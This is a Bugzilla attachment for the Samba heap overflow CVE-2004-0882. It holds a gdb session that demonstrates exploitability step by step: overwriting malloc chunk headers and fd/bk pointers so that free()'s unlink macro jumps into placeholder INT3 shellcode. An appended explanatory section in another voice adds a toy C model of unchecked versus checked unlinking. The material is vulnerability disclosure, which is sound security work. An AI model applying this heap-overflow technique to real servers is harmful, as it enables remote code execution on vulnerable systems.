Bugzilla – Attachment 26053 Details for Bug 61203: VUL-0: CVE-2004-0882: Samba 3.x heap overflow
proof-of-exploitability.txt (text/plain), 5.34 KB, created by Marcus Meissner on 2004-11-12 21:15:56 UTC
>corinnaVM:~# ps ax
>...
> 5841 ?        Ss     0:00 /usr/sbin/smbd -D
> 5842 ?        S      0:00 /usr/sbin/smbd -D
> 5843 tty1     S+     0:00 ./smbclient -I 127.0.0.1 -U badguy //xpee/badguy
> 5844 ?        S      0:00 /usr/sbin/smbd -D
> 5848 pts/2    R+     0:00 ps ax
>
>corinnaVM:~# gdb
>GNU gdb 6.1-debian
>Copyright 2004 Free Software Foundation, Inc.
>GDB is free software, covered by the GNU General Public License, and you are
>welcome to change it and/or distribute copies of it under certain conditions.
>Type "show copying" to see the conditions.
>There is absolutely no warranty for GDB.  Type "show warranty" for details.
>This GDB was configured as "i386-linux".
>(gdb) attach 5844
>Attaching to process 5844
>Reading symbols from /usr/sbin/smbd...done.
>Using host libthread_db library "/lib/tls/libthread_db.so.1".
>...
>Loaded symbols for /lib/tls/libnss_nis.so.2
>0x4025c3a8 in select () from /lib/tls/libc.so.6
>(gdb) continue
>Continuing.
>
>/// The breakpoint was created by compiling an INT 3 after the overwrite took place into trans2.c
>
>Program received signal SIGTRAP, Trace/breakpoint trap.
>call_trans2qfilepathinfo (conn=0x84282c0, inbuf=0x4051e008 "", outbuf=0x4053f008 "", length=1046, bufsize=131072,
>    pparams=0xbffff6e4, total_params=974, ppdata=0xbffff6e8, total_data=0) at smbd/trans2.c:2644
>
>(gdb) x/20x *ppdata-8
>
>/// Here the 0x00000409 is the malloc size descriptor
>/// (0x400 + 4) aligned to 8 + 1 (previous block NOT free)
>/// After that the packet data starts with 8 byte blocks of dates
>
>0x8429760:      0xcccccccc      0x00000409      0xadf90680      0x01c4c2ee
>0x8429770:      0xadf90680      0x01c4c2ee      0xadf90680      0x01c4c2ee
>0x8429780:      0xadf90680      0x01c4c2ee      0x00000010      0x00000000
>0x8429790:      0x00100000      0x00000000      0x00000000      0x00000000
>0x84297a0:      0x00000002      0x00000100      0x00000000      0x00000000
>
>/// Here the unicode filename of the reply starts \ followed by the
>/// name... Note the 0xcc (int 3/breakpoints) this is actually our
>/// shellcode for now
>
>0x84297b0:      0xcccc005c      0xcccccccc      0xcccccccc      0xcccccccc
>0x84297c0:      0xcccccccc      0xcccccccc      0xcccccccc      0xcccccccc
>0x84297d0:      0xcccccccc      0xcccccccc      0x0048cccc      0x00480048
>0x84297e0:      0x00480048      0x00480048      0x00480048      0x00480048
>0x84297f0:      0x00480048      0x00480048      0x00480048      0x00480048
>
>/// Now have a look at the end of the buffer
>
>(gdb) x/20x *ppdata-8+0x408-16
>
>/// The first line are normal 'H' chars transformed into unicode
>/// The second line starts with a "dummy" value (which is still in
>/// the allocated buffer)
>/// The actual overflow are the bytes from 0x8429b6c - 0x8429b6f
>/// The first of the 3 overflow values represents a size of -4 saying
>/// that the previous malloced block is actually filled. The -4 references
>/// of course to our "dummy" value which says that THIS malloc block is
>/// free. The other 2 values are
>/// 1. place on stack (-12) where RET-EIP is stored when the
>///    malloc/free unlink macro is called and
>/// 2. the place on heap where our shellcode (in our case only debugger
>///    breakpoints) is stored
>
>0x8429b58:      0x00480048      0x00480048      0x00480048      0x00480048
>0x8429b68:      0xfffffffc      0xfffffffd      0xbffff668      0x084297b8
>0x8429b78:      0x48484848      0x48484848      0x48484848      0x48484848
>0x8429b88:      0x48484848      0x48484848      0x48484848      0x48484848
>0x8429b98:      0x48484848      0x48484848      0x48484848      0x48484848
>
>(gdb) continue
>Continuing.
>
>/// TADA when free is called we land in our shellcode and voila
>
>Program received signal SIGTRAP, Trace/breakpoint trap.
>0x084297b9 in ?? ()
>(gdb)
>
>
>/// For those who do not understand all the stuff and why it happens
>/// here the result if our 1+2 pointers are changed to 0x55555555 and 0x66666666
>
>...
>(gdb) set *0x8429b70 = 0x55555555
>(gdb) set *0x8429b74 = 0x66666666
>(gdb) continue
>Continuing.
>
>Program received signal SIGSEGV, Segmentation fault.
>0x401fb498 in mallopt () from /lib/tls/libc.so.6
>
>/// Here the proof that we crash in the unlink macro
>/// Trying to do the unlink from the linked list...
>
>(gdb) x/5i $eip
>0x401fb498 <mallopt+1800>:      mov    %ebp,0xc(%eax)
>0x401fb49b <mallopt+1803>:      add    %edi,%esi
>0x401fb49d <mallopt+1805>:      mov    %eax,0x8(%ebp)
>0x401fb4a0 <mallopt+1808>:      mov    %esi,(%esi,%ecx,1)
>0x401fb4a3 <mallopt+1811>:      mov    0x14(%esp),%ebp
>
>/// Here the corresponding registers
>
>(gdb) i r
>eax            0x55555555       1431655765
>ecx            0x8429760        138581856
>edx            0xfffffff8       -8
>ebx            0x402bdedc       1076616924
>esp            0xbffff64c       0xbffff64c
>ebp            0x66666666       0x66666666
>esi            0x408            1032
>edi            0xfffffff8       -8
>eip            0x401fb498       0x401fb498
>eflags         0x10246          66118
>cs             0x73             115
>ss             0x7b             123
>ds             0x7b             123
>es             0x7b             123
>fs             0x0              0
>gs             0x33             51
>
>/// Here the proof that we are actually the "unlink macro" called from free
>
>(gdb) x/5i *(0xbffff668+12)
>0x401fa2b0 <free+144>:  cmpl   $0x0,%gs:0xc
>0x401fa2b8 <free+152>:  je,pt  0x401fa2bc <free+156>
>0x401fa2bb <free+155>:  lock subl $0x1,(%esi)
>0x401fa2bf <free+159>:  jne    0x401fdd68 <posix_memalign+6072>
>0x401fa2c5 <free+165>:  jmp    0x401fa257 <free+55>
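The SIGSEGV in mallopt() above is free()'s unlink macro writing through the two overwritten fd/bk pointers. As an added illustration (not part of the attachment, nor Samba or glibc code), this toy C model puts the 2004-era unchecked unlink beside the back-pointer check that glibc later adopted ("corrupted double-linked list"), run over a constructed free list; the chunk struct, names and values are assumptions for the demo.

```c
#include <stddef.h>
/* Toy dlmalloc-style free chunk (constructed for this example, not glibc's real
 * malloc_chunk): fd/bk are the free-list links rewired by the unlink macro. */
typedef struct chunk { size_t prev_size, size; struct chunk *fd, *bk; } chunk_t;

/* The 2004-era unlink trusts fd/bk blindly, so attacker-controlled links turn
 * "FD->bk = BK; BK->fd = FD" into two arbitrary pointer-sized writes (the
 * faulting mov %ebp,0xc(%eax) in the session above is the first of them). */
static void unlink_unchecked(chunk_t *p) {
    chunk_t *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Safe unlinking, as later added to glibc: both neighbours must point back at
 * p, otherwise the list is corrupt and nothing is written. */
static int unlink_checked(chunk_t *p) {
    chunk_t *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;                      /* corrupted double-linked list */
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

static chunk_t a, b, c, decoy;   /* circular list a<->b<->c; decoy = stray target */
static void reset_list(void) {
    a = (chunk_t){0, 0x408, &b, &c}; b = (chunk_t){0, 0x408, &c, &a};
    c = (chunk_t){0, 0x408, &a, &b}; decoy = (chunk_t){0, 0, NULL, NULL};
}
/* Simulated overflow: b's links no longer point into the real list. */
static void corrupt_b(void) { b.fd = b.bk = &decoy; }

/* 1 if the unchecked unlink wrote through the corrupted links into decoy. */
int unchecked_is_fooled(void) {
    reset_list(); corrupt_b();
    unlink_unchecked(&b);
    return decoy.fd == &decoy && decoy.bk == &decoy;
}

/* 1 if the checked unlink refused the corrupt chunk and left decoy untouched. */
int checked_detects(void) {
    reset_list(); corrupt_b();
    return unlink_checked(&b) == -1 && decoy.fd == NULL;
}

/* 1 if the checked unlink still removes b cleanly from an intact list. */
int checked_accepts_valid(void) {
    reset_list();
    return unlink_checked(&b) == 0 && a.fd == &c && c.bk == &a;
}
```

The decoy stands in for whatever the overwritten pointers happen to address; in the real crash those were 0x55555555 and 0x66666666, which is why the unchecked write faults instead of landing somewhere useful to the attacker.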